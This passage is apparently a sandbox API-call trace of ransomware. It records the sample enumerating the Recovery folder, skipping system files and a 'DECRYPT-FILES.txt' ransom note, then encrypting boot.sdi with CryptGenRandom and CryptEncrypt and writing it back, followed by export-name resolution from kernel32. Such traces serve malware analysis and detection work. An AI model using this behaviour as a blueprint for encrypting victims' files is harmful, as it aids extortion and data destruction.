cAlternateFileName="")) returned 0x5f8c18 [0071.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.442] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.442] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="DECRYPT-FILES.txt") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="autorun.inf") returned 1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="boot.ini") returned 1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="desktop.ini") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="iconcache.db") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="bootsect.bak") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat.log") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="thumbs.db") returned -1 [0071.442] lstrcmpiW (lpString1="boot.sdi", lpString2="Bootfont.bin") returned -1 [0071.442] lstrlenW (lpString="boot.sdi") returned 8 [0071.442] lstrcmpiW (lpString1="sdi", lpString2="lnk") returned 1 [0071.442] lstrcmpiW (lpString1="sdi", lpString2="exe") returned 1 [0071.442] lstrcmpiW (lpString1="sdi", lpString2="sys") returned -1 [0071.442] lstrcmpiW (lpString1="sdi", lpString2="dll") returned 1 [0071.442] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.442] lstrlenW (lpString="boot.sdi") returned 8 [0071.442] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0071.443] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="boot.sdi" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0071.443] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.443] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0071.443] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x3f2e368 | out: lpFileSize=0x3f2e368*=3170304) returned 1 [0071.443] CreateFileMappingW (hFile=0x430, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x434 [0071.443] MapViewOfFile (hFileMappingObject=0x434, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4110000 [0071.446] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0071.447] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0071.447] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0071.448] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0071.448] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0071.578] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.578] WriteFile (in: hFile=0x430, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0071.579] CloseHandle (hObject=0x0) returned 0 [0071.579] CloseHandle (hObject=0x430) returned 1 [0071.638] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.638] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.638] GetTickCount () returned 0x114a757 [0071.638] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.639] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0071.639] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0071.639] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0071.639] lstrlenA (lpString="kernel32.dll") returned 12 [0071.639] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0071.639] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0071.639] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0071.639] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0071.639] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0071.639] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0071.639] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0071.639] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0071.640] lstrlenA (lpString="ADDATOMA") returned 8 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0071.640] lstrlenA (lpString="ADDATOMW") returned 8 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0071.640] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0071.640] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0071.640] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0071.640] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0071.640] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0071.640] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0071.640] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0071.640] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0071.640] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0071.640] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0071.640] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0071.640] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0071.640] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0071.640] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0071.640] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0071.640] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0071.640] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0071.641] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0071.641] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0071.641] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0071.641] lstrlenA (lpString="BACKUPREAD") returned 10 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0071.641] lstrlenA (lpString="BACKUPSEEK") returned 10 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0071.641] lstrlenA (lpString="BACKUPWRITE") returned 11 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0071.641] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0071.641] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0071.641] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0071.641] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0071.641] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0071.641] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0071.641] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0071.641] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0071.641] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0071.641] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0071.641] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0071.641] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0071.641] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0071.641] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0071.642] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0071.642] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0071.642] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0071.642] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0071.642] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0071.642] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0071.642] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0071.642] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0071.642] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0071.642] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0071.642] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0071.642] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0071.642] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0071.642] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0071.642] lstrlenA (lpString="BEEP") returned 4 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0071.642] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0071.642] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0071.642] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0071.642] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0071.642] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0071.643] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0071.643] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0071.643] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0071.643] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0071.643] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0071.643] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0071.643] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0071.643] lstrlenA (lpString="CANCELIO") returned 8 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0071.643] lstrlenA (lpString="CANCELIOEX") returned 10 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0071.643] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0071.643] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0071.643] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0071.643] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0071.643] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0071.643] lstrlenA (lpString="CHECKELEVATION") returned 14 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0071.643] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0071.643] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0071.643] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0071.643] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0071.644] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0071.644] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0071.644] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0071.644] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0071.644] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0071.644] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0071.644] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0071.644] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0071.644] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0071.644] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0071.644] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0071.644] lstrcpyA (in: 